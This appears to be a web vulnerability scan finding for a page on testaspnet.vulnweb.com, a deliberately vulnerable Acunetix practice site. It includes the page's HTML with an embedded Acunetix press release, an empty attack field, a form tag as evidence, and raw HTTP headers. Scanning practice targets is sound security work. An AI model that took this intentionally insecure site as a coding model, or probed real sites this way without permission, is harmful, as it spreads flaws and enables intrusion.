ICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 17979
Response Body - size: 17,979 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 